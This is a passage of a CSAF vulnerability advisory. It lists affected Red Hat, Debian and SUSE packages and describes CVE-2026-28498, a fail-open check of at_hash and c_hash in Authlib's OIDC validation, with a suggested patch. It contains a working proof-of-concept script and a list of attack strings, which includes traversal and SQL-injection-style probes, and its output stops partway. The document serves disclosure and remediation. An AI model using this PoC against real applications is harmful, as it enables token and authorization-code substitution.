                                                "purl": "pkg:oci/quay-container-security-operator-bundle@sha256%3Aa48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775?arch=amd64&repository_url=registry.redhat.io/quay&tag=1773785431"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "quay-container-security-operator-bundle"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1773784956",
                                        "product": {
                                            "name": "vers:oci/1773784956",
                                            "product_id": "CSAFPID-5986180",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/quay-container-security-operator-rhel9@sha256%3Ab5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f?arch=s390x&repository_url=registry.redhat.io/quay&tag=1773784956"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "quay-container-security-operator-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774539928",
                                        "product": {
                                            "name": "vers:oci/1774539928",
                                            "product_id": "CSAFPID-5986181",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/quay-operator-bundle@sha256%3A1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70?arch=amd64&repository_url=registry.redhat.io/quay&tag=1774539928"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "quay-operator-bundle"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1773784969",
                                        "product": {
                                            "name": "vers:oci/1773784969",
                                            "product_id": "CSAFPID-5986182",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/quay-operator-rhel9@sha256%3Ad8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b?arch=ppc64le&repository_url=registry.redhat.io/quay&tag=1773784969"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "quay-operator-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1775069491",
                                        "product": {
                                            "name": "vers:oci/1775069491",
                                            "product_id": "CSAFPID-5986173",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/quay-rhel9@sha256%3Ade5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e?arch=s390x&repository_url=registry.redhat.io/quay&tag=1775069491"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "quay-rhel9"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Quay"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/6",
                                "product": {
                                    "name": "vers:rpm/6",
                                    "product_id": "CSAFPID-1439313",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:satellite:6"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Satellite 6"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5222639"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "foreman-mcp-server-rhel9"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Satellite 6"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2831634"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "lightspeed-chatbot-rhel8"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5035448"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "lightspeed-chatbot-rhel9"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Ansible Automation Platform 2"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5474798"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "lightspeed-stack-rhel9"
                            }
                        ],
                        "category": "product_family",
                        "name": "Lightspeed Core"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5811359"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-mlflow-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5068100"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-pipeline-runtime-datascience-cpu-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5068103"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-pipeline-runtime-minimal-cpu-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5068105"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-pipeline-runtime-pytorch-cuda-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5222767"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-pipeline-runtime-pytorch-llmcompressor-cuda-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5068108"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-pipeline-runtime-pytorch-rocm-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5068110"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-pipeline-runtime-tensorflow-cuda-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5155537"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-pipeline-runtime-tensorflow-rocm-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5068114"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-workbench-codeserver-datascience-cpu-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5068116"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-workbench-jupyter-datascience-cpu-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5068119"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-workbench-jupyter-minimal-cpu-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5068121"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-workbench-jupyter-minimal-cuda-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5068123"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-workbench-jupyter-minimal-rocm-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5068126"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-workbench-jupyter-pytorch-cuda-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5222780"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-workbench-jupyter-pytorch-llmcompressor-cuda-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5068128"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-workbench-jupyter-pytorch-rocm-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5068131"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-workbench-jupyter-tensorflow-cuda-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5155538"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-workbench-jupyter-tensorflow-rocm-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5068134"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-workbench-jupyter-trustyai-cpu-py312-rhel9"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat OpenShift AI (RHOAI)"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-1455906"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "quay-rhel8"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5355695"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "quay-rhel9"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Quay 3"
                    }
                ],
                "category": "vendor",
                "name": "Red Hat"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<1.6.9",
                                "product": {
                                    "name": "vers:unknown/<1.6.9",
                                    "product_id": "CSAFPID-5830119",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:authlib:authlib:*:*:*:*:*:*:*:*"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Authlib"
                    }
                ],
                "category": "vendor",
                "name": "Authlib"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/unknown",
                                "product": {
                                    "name": "vers:unknown/unknown",
                                    "product_id": "CSAFPID-1317174",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/o:suse:suse_linux:-"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "SuSE Linux"
                    }
                ],
                "category": "vendor",
                "name": "SUSE"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<1.6.9",
                                "product": {
                                    "name": "vers:unknown/<1.6.9",
                                    "product_id": "CSAFPID-5970752"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "authlib"
                    }
                ],
                "category": "vendor",
                "name": "unknown"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:deb/unknown",
                                        "product": {
                                            "name": "vers:deb/unknown",
                                            "product_id": "CSAFPID-1405217"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "python-authlib"
                            }
                        ],
                        "category": "product_family",
                        "name": "bookworm"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:deb/unknown",
                                        "product": {
                                            "name": "vers:deb/unknown",
                                            "product_id": "CSAFPID-1405218"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "python-authlib"
                            }
                        ],
                        "category": "product_family",
                        "name": "bullseye"
                    }
                ],
                "category": "vendor",
                "name": "Debian"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-28498",
            "cwe": {
                "id": "CWE-354",
                "name": "Improper Validation of Integrity Check Value"
            },
            "flags": [
                {
                    "label": "vulnerable_code_not_present",
                    "product_ids": [
                        "CSAFPID-5973066",
                        "CSAFPID-5973067",
                        "CSAFPID-5973068",
                        "CSAFPID-5973069",
                        "CSAFPID-5973070",
                        "CSAFPID-5973071",
                        "CSAFPID-5973072",
                        "CSAFPID-5973073",
                        "CSAFPID-5973074",
                        "CSAFPID-5973075",
                        "CSAFPID-5973076",
                        "CSAFPID-5973077",
                        "CSAFPID-5973078",
                        "CSAFPID-5973079",
                        "CSAFPID-5973080",
                        "CSAFPID-5973081",
                        "CSAFPID-5973082",
                        "CSAFPID-5973083",
                        "CSAFPID-5973084",
                        "CSAFPID-5973085",
                        "CSAFPID-5973086",
                        "CSAFPID-5973087",
                        "CSAFPID-5973088",
                        "CSAFPID-5973089",
                        "CSAFPID-5973090",
                        "CSAFPID-5973091",
                        "CSAFPID-5973092",
                        "CSAFPID-5973066",
                        "CSAFPID-5973067",
                        "CSAFPID-5973068",
                        "CSAFPID-5973069",
                        "CSAFPID-5973070",
                        "CSAFPID-5973071",
                        "CSAFPID-5973072",
                        "CSAFPID-5973073",
                        "CSAFPID-5973074",
                        "CSAFPID-5973075",
                        "CSAFPID-5973078",
                        "CSAFPID-5973079",
                        "CSAFPID-5973080",
                        "CSAFPID-5973081",
                        "CSAFPID-5973082",
                        "CSAFPID-5973083",
                        "CSAFPID-5973084",
                        "CSAFPID-5973085",
                        "CSAFPID-5973086",
                        "CSAFPID-5973087",
                        "CSAFPID-5973088",
                        "CSAFPID-5973089",
                        "CSAFPID-5973090",
                        "CSAFPID-5973091",
                        "CSAFPID-5973092",
                        "CSAFPID-5984227",
                        "CSAFPID-5986174",
                        "CSAFPID-5986175",
                        "CSAFPID-5986176",
                        "CSAFPID-5986177",
                        "CSAFPID-5986178",
                        "CSAFPID-5986179",
                        "CSAFPID-5986180",
                        "CSAFPID-5986181",
                        "CSAFPID-5986182"
                    ]
                }
            ],
            "notes": [
                {
                    "category": "description",
                    "text": "## 1. Executive Summary\n\nA critical library-level vulnerability was identified in the **Authlib** Python library concerning the validation of OpenID Connect (OIDC) ID Tokens. Specifically, the internal hash verification logic (`_verify_hash`) responsible for validating the `at_hash` (Access Token Hash) and `c_hash` (Authorization Code Hash) claims exhibits a **fail-open** behavior when encountering an unsupported or unknown cryptographic algorithm. \n\nThis flaw allows an attacker to bypass mandatory integrity protections by supplying a forged ID Token with a deliberately unrecognized `alg` header parameter. The library intercepts the unsupported state and silently returns `True` (validation passed), inherently violating fundamental cryptographic design principles and direct OIDC specifications.\n\n---\n\n## 2. Technical Details & Root Cause\n\nThe vulnerability resides within the `_verify_hash(signature, s, alg)` function in `authlib/oidc/core/claims.py`:\n\n```python\ndef _verify_hash(signature, s, alg):\n    hash_value = create_half_hash(s, alg)\n    if not hash_value:        # ← VULNERABILITY: create_half_hash returns None for unknown algorithms\n        return True            # ← BYPASS: The verification silently passes\n    return hmac.compare_digest(hash_value, to_bytes(signature))\n```\n\nWhen an unsupported algorithm string (e.g., `\"XX999\"`) is processed by the helper function `create_half_hash` in `authlib/oidc/core/util.py`, the internal `getattr(hashlib, hash_type, None)` call fails, and the function correctly returns `None`. \n\nHowever, instead of triggering a `Fail-Closed` cryptographic state (raising an exception or returning `False`), the `_verify_hash` function misinterprets the `None` return value and explicitly returns `True`. 
\n\nBecause developers rely on the standard `.validate()` method provided by Authlib's `IDToken` class—which internally calls this flawed function—there is **no mechanism for the implementing developer to prevent this bypass**. It is a strict library-level liability.\n\n---\n\n## 3. Attack Scenario\n\nThis vulnerability exposes applications utilizing Hybrid or Implicit OIDC flows to **Token Substitution Attacks**.\n\n1. An attacker initiates an OIDC flow and receives a legitimately signed ID Token, but wishes to substitute the bound Access Token (`access_token`) or Authorization Code (`code`) with a malicious or mismatched one.\n2. The attacker rewrites the JWT header of the ID Token, setting the `alg` parameter to an arbitrary, unsupported value (e.g., `{\"alg\": \"CUSTOM_ALG\"}`).\n3. The server uses Authlib to validate the incoming token. Because `alg` is also the JWS signing algorithm, rewriting it invalidates the token's existing signature; this step therefore only succeeds where signature verification is skipped, bypassed, or performed on a copy of the token other than the one whose claims are validated. Processing then progresses to the claims validation phase.\n4. Authlib attempts to validate the `at_hash` or `c_hash` claims. \n5. Because `\"CUSTOM_ALG\"` is unsupported by `hashlib`, `create_half_hash` returns `None`.\n6. Authlib's `_verify_hash` receives `None` and silently returns `True`.\n7. **Result:** The application accepts the substituted/malicious Access Token or Authorization Code without any cryptographic verification of the binding hash.\n\nNote that no forgery is required to reach the same fail-open path: any legitimately signed ID Token whose `alg` value `create_half_hash` cannot map to a `hashlib` digest also causes `_verify_hash` to return `True`, so in deployments that accept such a signing algorithm the `at_hash`/`c_hash` binding is never checked at all.\n\n---\n\n## 4. Specification & Standards Violations\n\nThis explicit fail-open behavior violates multiple foundational RFCs and Core Specifications. 
A secure cryptographic library **MUST** fail and reject material when encountering unsupported cryptographic parameters.\n\n**OpenID Connect Core 1.0**\n* **§ 3.2.2.9 (Access Token Validation):** \"If the ID Token contains an `at_hash` Claim, the Client MUST verify that the hash value of the Access Token matches the value of the `at_hash` Claim.\" Silently skipping the validation check directly contradicts this absolute requirement.\n* **§ 3.3.2.11 (Authorization Code Validation):** Identically mandates the verification of the `c_hash` Claim.\n\n**IETF JSON Web Token (JWT) Best Current Practices (BCP)**\n* **RFC 8725 § 3.1 (Perform Algorithm Verification):** requires libraries to restrict cryptographic operations to a caller-specified set of supported algorithms and never to use any other algorithm. Authlib's implementation instead treats an algorithm it cannot map to a digest as grounds to accept the hash rather than to reject the token.\n\n**IETF JSON Web Signature (JWS)**\n* **RFC 7515 § 5.2 (Message Signature or MAC Validation):** requires that a JWS whose signature validation fails MUST be rejected; nothing in JWS permits treating an algorithm the implementation cannot process as a successful validation. By returning `True` for an unsupported-algorithm state, Authlib violates this requirement.\n\n---\n\n## 5. Remediation Recommendation\n\nDeployments should upgrade to Authlib 1.6.9 or later (affected versions are listed as `<1.6.9` in the product tree). For reference, the `_verify_hash` function must be patched to enforce a `Fail-Closed` posture: if an algorithm is unsupported and cannot produce a hash for comparison, the validation **must** fail immediately.\n\n**Suggested Patch (`authlib/oidc/core/claims.py`):**\n\n```python\ndef _verify_hash(signature, s, alg):\n    hash_value = create_half_hash(s, alg)\n    if hash_value is None:\n        # FAIL-CLOSED: The algorithm is unsupported, reject the token.\n        return False\n    return hmac.compare_digest(hash_value, to_bytes(signature))\n```\n\n---\n\n## 6. Proof of Concept (PoC)\n\nThe following standalone script demonstrates the vulnerability across the Root Cause, Implicit Flow (`at_hash`), Hybrid Flow (`c_hash`), and the entire attack surface. 
It utilizes Authlib's own validation logic to prove the Fail-Open behavior.\n\n```bash\npython3 -m venv venv\nsource venv/bin/activate\npip install authlib cryptography\npython3 -c \"import authlib; print(authlib.__version__)\"\n# → 1.6.8\n```\n\n```python\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n@title          OIDC at_hash / c_hash Verification Bypass\n@affected       authlib <= 1.6.8\n@file           authlib/oidc/core/claims.py :: _verify_hash()\n@notice         _verify_hash() retorna True cuando create_half_hash() retorna\n                None (alg no soportado), causando Fail-Open en la verificacion\n                de binding entre ID Token y Access Token / Authorization Code.\n@dev            Reproduce el bypass directamente contra el codigo de authlib\n                sin mocks. Todas las llamadas son al modulo real instalado.\n\"\"\"\n\nimport hmac\nimport hashlib\nimport base64\nimport time\n\nimport authlib\nfrom authlib.common.encoding   import to_bytes\nfrom authlib.oidc.core.util    import create_half_hash\nfrom authlib.oidc.core.claims  import IDToken, HybridIDToken\nfrom authlib.oidc.core.claims  import _verify_hash as authlib_verify_hash\n\n# ─── helpers ──────────────────────────────────────────────────────────────────\n\nR   = \"\\033[0m\"\nRED = \"\\033[91m\"\nGRN = \"\\033[92m\"\nYLW = \"\\033[93m\"\nCYN = \"\\033[96m\"\nBLD = \"\\033[1m\"\nDIM = \"\\033[2m\"\n\ndef header(title):\n    print(f\"\\n{CYN}{'─' * 64}{R}\")\n    print(f\"{BLD}{title}{R}\")\n    print(f\"{CYN}{'─' * 64}{R}\")\n\ndef ok(msg):   print(f\"  {GRN}[OK]      {R}{msg}\")\ndef fail(msg): print(f\"  {RED}[BYPASS]  {R}{BLD}{msg}{R}\")\ndef info(msg): print(f\"  {DIM}          {msg}{R}\")\n\ndef at_hash_correct(token: str, alg: str) -> str:\n    \"\"\"\n    @notice  Computa at_hash segun OIDC Core 1.0 s3.2.2.9.\n    @param   token  Access token ASCII\n    @param   alg    Algoritmo del header del ID Token\n    @return  str    at_hash en Base64url sin 
padding\n    \"\"\"\n    fn = {\"256\": hashlib.sha256, \"384\": hashlib.sha384, \"512\": hashlib.sha512}\n    digest = fn.get(alg[-3:], hashlib.sha256)(token.encode()).digest()\n    return base64.urlsafe_b64encode(digest[:len(digest)//2]).rstrip(b\"=\").decode()\n\n\ndef _verify_hash_patched(signature: str, s: str, alg: str) -> bool:\n    \"\"\"\n    @notice  Version corregida de _verify_hash() con semantica Fail-Closed.\n    @dev     Fix: `if not hash_value` -> `if hash_value is None`\n             None es falsy en Python, pero b\"\" no lo es. El chequeo original\n             no distingue entre \"algoritmo no soportado\" y \"hash vacio\".\n    \"\"\"\n    hash_value = create_half_hash(s, alg)\n    if hash_value is None:\n        return False\n    return hmac.compare_digest(hash_value, to_bytes(signature))\n\n# ─── test 1: root cause ───────────────────────────────────────────────────────\n\ndef test_root_cause():\n    \"\"\"\n    @notice  Demuestra que create_half_hash() retorna None para alg desconocido\n             y que _verify_hash() interpreta ese None como verificacion exitosa.\n    \"\"\"\n    header(\"TEST 1 - Root Cause: create_half_hash() + _verify_hash()\")\n\n    token    = \"real_access_token_from_AS\"\n    fake_sig = \"AAAAAAAAAAAAAAAAAAAAAA\"\n    alg      = \"CUSTOM_ALG\"\n\n    half_hash = create_half_hash(token, alg)\n    info(f\"create_half_hash(token, {alg!r})  ->  {half_hash!r}  (None = alg no soportado)\")\n\n    result_vuln    = authlib_verify_hash(fake_sig, token, alg)\n    result_patched = _verify_hash_patched(fake_sig, token, alg)\n\n    print()\n    if result_vuln:\n        fail(f\"authlib _verify_hash() retorno True con firma falsa y alg={alg!r}\")\n    else:\n        ok(f\"authlib _verify_hash() retorno False\")\n\n    if not result_patched:\n        ok(f\"_verify_hash_patched() retorno False (fail-closed correcto)\")\n    else:\n        fail(f\"_verify_hash_patched() retorno True\")\n\n# ─── test 2: IDToken.validate_at_hash() 
bypass ────────────────────────────────\n\ndef test_at_hash_bypass():\n    \"\"\"\n    @notice  Demuestra el bypass end-to-end en IDToken.validate_at_hash().\n             El atacante modifica el header alg del JWT a un valor no soportado.\n             validate_at_hash() no levanta excepcion -> token aceptado.\n\n    @dev     Flujo real de authlib:\n               validate_at_hash() -> _verify_hash(at_hash, access_token, alg)\n               -> create_half_hash(access_token, \"CUSTOM_ALG\") -> None\n               -> `if not None` -> True -> no InvalidClaimError -> BYPASS\n    \"\"\"\n    header(\"TEST 2 - IDToken.validate_at_hash() Bypass (Implicit / Hybrid Flow)\")\n\n    real_token  = \"ya29.LEGITIMATE_token_from_real_AS\"\n    evil_token  = \"ya29.MALICIOUS_token_under_attacker_control\"\n    fake_at_hash = \"FAAAAAAAAAAAAAAAAAAAA\"\n\n    # --- caso A: token legitimo con alg correcto ---\n    correct_hash = at_hash_correct(real_token, \"RS256\")\n    token_legit  = IDToken(\n        {\"iss\": \"https://idp.example.com\", \"sub\": \"user\", \"aud\": \"client\",\n         \"exp\": int(time.time()) + 3600, \"iat\": int(time.time()),\n         \"at_hash\": correct_hash},\n        {\"access_token\": real_token}\n    )\n    token_legit.header = {\"alg\": \"RS256\"}\n\n    try:\n        token_legit.validate_at_hash()\n        ok(f\"Caso A (legitimo, RS256):  at_hash={correct_hash}  ->  aceptado\")\n    except Exception as e:\n        fail(f\"Caso A rechazo el token legitimo: {e}\")\n\n    # --- caso B: token malicioso con alg forjado ---\n    token_forged = IDToken(\n        {\"iss\": \"https://idp.example.com\", \"sub\": \"user\", \"aud\": \"client\",\n         \"exp\": int(time.time()) + 3600, \"iat\": int(time.time()),\n         \"at_hash\": fake_at_hash},\n        {\"access_token\": evil_token}\n    )\n    token_forged.header = {\"alg\": \"CUSTOM_ALG\"}\n\n    try:\n        token_forged.validate_at_hash()\n        fail(f\"Caso B (atacante, alg=CUSTOM_ALG):  
at_hash={fake_at_hash}  ->  BYPASS exitoso\")\n        info(f\"access_token del atacante aceptado: {evil_token}\")\n    except Exception as e:\n        ok(f\"Caso B rechazado correctamente: {e}\")\n\n# ─── test 3: HybridIDToken.validate_c_hash() bypass ──────────────────────────\n\ndef test_c_hash_bypass():\n    \"\"\"\n    @notice  Mismo bypass pero para c_hash en Hybrid Flow.\n             Permite Authorization Code Substitution Attack.\n    @dev     OIDC Core 1.0 s3.3.2.11 exige verificacion obligatoria de c_hash.\n             Authlib la omite cuando el alg es desconocido.\n    \"\"\"\n    header(\"TEST 3 - HybridIDToken.validate_c_hash() Bypass (Hybrid Flow)\")\n\n    real_code  = \"SplxlOBeZQQYbYS6WxSbIA\"\n    evil_code  = \"ATTACKER_FORGED_AUTH_CODE\"\n    fake_chash = \"ZZZZZZZZZZZZZZZZZZZZZZ\"\n\n    token = HybridIDToken(\n        {\"iss\": \"https://idp.example.com\", \"sub\": \"user\", \"aud\": \"client\",\n         \"exp\": int(time.time()) + 3600, \"iat\": int(time.time()),\n         \"nonce\": \"n123\", \"at_hash\": \"AAAA\", \"c_hash\": fake_chash},\n        {\"code\": evil_code, \"access_token\": \"sometoken\"}\n    )\n    token.header = {\"alg\": \"XX9999\"}\n\n    try:\n        token.validate_c_hash()\n        fail(f\"c_hash={fake_chash!r} aceptado con alg=XX9999 -> Authorization Code Substitution posible\")\n        info(f\"code del atacante aceptado: {evil_code}\")\n    except Exception as e:\n        ok(f\"Rechazado correctamente: {e}\")\n\n# ─── test 4: superficie de ataque ─────────────────────────────────────────────\n\ndef test_attack_surface():\n    \"\"\"\n    @notice  Mapea todos los valores de alg que disparan el bypass.\n    @dev     create_half_hash hace: getattr(hashlib, f\"sha{alg[2:]}\", None)\n             Cualquier string que no resuelva a un atributo de hashlib -> None -> bypass.\n    \"\"\"\n    header(\"TEST 4 - Superficie de Ataque\")\n\n    token    = \"test_token\"\n    fake_sig = \"AAAAAAAAAAAAAAAAAAAAAA\"\n\n    vectors 
= [\n        \"CUSTOM_ALG\", \"XX9999\", \"none\", \"None\", \"\", \"RS\", \"SHA256\",\n        \"HS0\", \"EdDSA256\", \"PS999\", \"RS 256\", \"../../../etc\", \"' OR '1'='1\",\n    ]\n\n    print(f\"  {'alg':<22}  {'half_hash':<10}  resultado\")\n    print(f\"  {'-'*22}  {'-'*10}  {'-'*20}\")\n\n    for alg in vectors:\n        hv     = create_half_hash(token, alg)\n        result = authlib_verify_hash(fake_sig, token, alg)\n        hv_str = \"None\" if hv is None else \"bytes\"\n        res_str = f\"{RED}BYPASS{R}\" if result else f\"{GRN}OK{R}\"\n        print(f\"  {alg!r:<22}  {hv_str:<10}  {res_str}\")\n\n# ─── main ─────────────────────────────────────────────────────────────────────\n\nif __name__ == \"__main__\":\n    print(f\"\\n{BLD}authlib {authlib.__version__} - OIDC Hash Verification Bypass PoC{R}\")\n    print(f\"authlib/oidc/core/claims.py :: _verify_hash() \\n\")\n\n    test_root_cause()\n    test_at_hash_bypass()\n    test_c_hash_bypass()\n    test_attack_surface()\n\n    print(f\"\\n{DIM}Fix: `if not hash_value` -> `if hash_value is None` en _verify_hash(){R}\\n\")\n```\n\n---\n\n## Output\n\n```bash\nauthlib 1.6.8 - OIDC Hash Verification Bypass PoC\nauthlib/oidc/core/claims.py :: _verify_hash() \n\n\n────────────────────────────────────────────────────────────────\nTEST 1 - Root Cause: create_half_hash() + _verify_hash()\n────────────────────────────────────────────────────────────────\n            create_half_hash(token, 'CUSTOM_ALG')  ->  None  (None = alg no soportado)\n\n  [BYPASS]  authlib _verify_hash() retorno True con firma falsa y alg='CUSTOM_ALG'\n  [OK]      